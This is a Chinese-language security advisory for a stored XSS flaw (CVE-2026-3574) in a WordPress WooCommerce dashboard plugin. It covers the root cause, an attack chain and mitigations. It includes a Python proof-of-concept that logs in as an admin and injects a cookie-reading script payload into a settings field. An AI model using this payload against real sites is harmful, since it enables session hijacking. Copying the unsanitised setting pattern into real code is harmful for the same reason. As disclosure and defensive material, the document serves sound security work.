CVE-2026-3574 Experto Dashboard插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-3574

漏洞类型

Stored Cross-Site Scripting (存储型跨站脚本)

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Experto Dashboard for WooCommerce (WordPress Plugin)

漏洞概述

WordPress插件“Experto Dashboard for WooCommerce”在1.0.4及所有先前版本中存在存储型跨站脚本（XSS）漏洞。该漏洞源于插件设置字段（如导航字体大小、字重等）缺乏输入清理和输出转义。攻击者需具备管理员权限，利用未经过滤的设置选项注入恶意脚本。尽管权限要求较高，但在多站点安装或禁用unfiltered_html的站点中，此漏洞允许攻击者劫持会话或执行恶意操作，对管理员构成威胁。

技术细节

该漏洞的核心技术缺陷在于WordPress设置API的使用不当。在`register_setting()`注册选项时，开发者未定义`sanitize_callback`，导致用户提交的字体设置参数未经消毒处理直接存入数据库。其次，在`field_callback()`函数中，代码直接通过`printf`输出数据库中的值，未使用`esc_attr()`进行上下文感知的转义。这种组合使得存储的Payload在设置页面被渲染时触发。攻击流程为：攻击者（管理员）修改设置字段为XSS Payload -> 数据保存 -> 其他管理员访问设置页面 -> 浏览器解析并执行Payload。这在WordPress多站点网络或严格权限配置下尤为危险，因为它绕过了对未过滤HTML的默认限制。

攻击链分析

STEP 1

1. 凭证获取

攻击者通过钓鱼、暴力破解或其他手段获取WordPress管理员账户的凭证。

STEP 2

2. 访问设置页面

攻击者使用管理员凭证登录后台，并导航至Experto Dashboard for WooCommerce的设置页面。

STEP 3

3. 注入恶意载荷

攻击者在“Navigation Font Size”或其他受影响的设置字段中输入JavaScript恶意代码（如XSS Payload），并保存设置。

STEP 4

4. 载荷存储

由于缺乏输入清理（sanitize callback），恶意代码被原样存储在WordPress数据库的options表中。

STEP 5

5. 触发漏洞

当其他管理员用户访问该插件设置页面时，页面从数据库读取恶意内容。由于缺乏输出转义（esc_attr），恶意脚本在受害者的浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Title: Experto Dashboard for WooCommerce < 1.0.4 - Stored XSS (Admin)
# Date: 2026-04-09
# Exploit Author: Analyst
# Vendor Homepage: https://wordpress.org/plugins/experto-custom-dashboard/
# Version: <= 1.0.4

import requests

# Configuration
target_url = 'http://example.com/wp-admin/admin.php?page=experto-dashboard-settings'
login_url = 'http://example.com/wp-login.php'
username = 'admin'
password = 'password'

# Start a session
session = requests.Session()

# 1. Login to WordPress
payload_login = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': target_url
}
session.post(login_url, data=payload_login)

# 2. Send malicious payload to vulnerable setting
# Vulnerable fields: 'nav_font_size', 'nav_font_weight', 'head_font_size', etc.
xss_payload = '"><script>alert(document.cookie)</script>'

exploit_data = {
    'option_page': 'experto_dashboard_options',
    'action': 'update',
    '_wpnonce': '[GET_NONCE_FROM_PAGE]', # Need to scrape this nonce first
    '_wp_http_referer': '/wp-admin/admin.php?page=experto-dashboard-settings',
    'nav_font_size': xss_payload, # Injecting into Navigation Font Size
    'submit': 'Save Changes'
}

# Note: In a real scenario, you must first GET the page to extract the _wpnonce value.
# response = session.post(target_url, data=exploit_data)
# if response.status_code == 200:
#     print("Payload injected successfully. Visit settings page to trigger XSS.")

影响范围

Experto Dashboard for WooCommerce <= 1.0.4

防御指南

临时缓解措施

建议立即检查并更新该插件至修复版本。在无法立即更新的情况下，可暂时卸载插件以阻断攻击面。同时，应加强管理员账户的安全防护（如启用多因素认证MFA），防止凭证泄露导致漏洞被利用。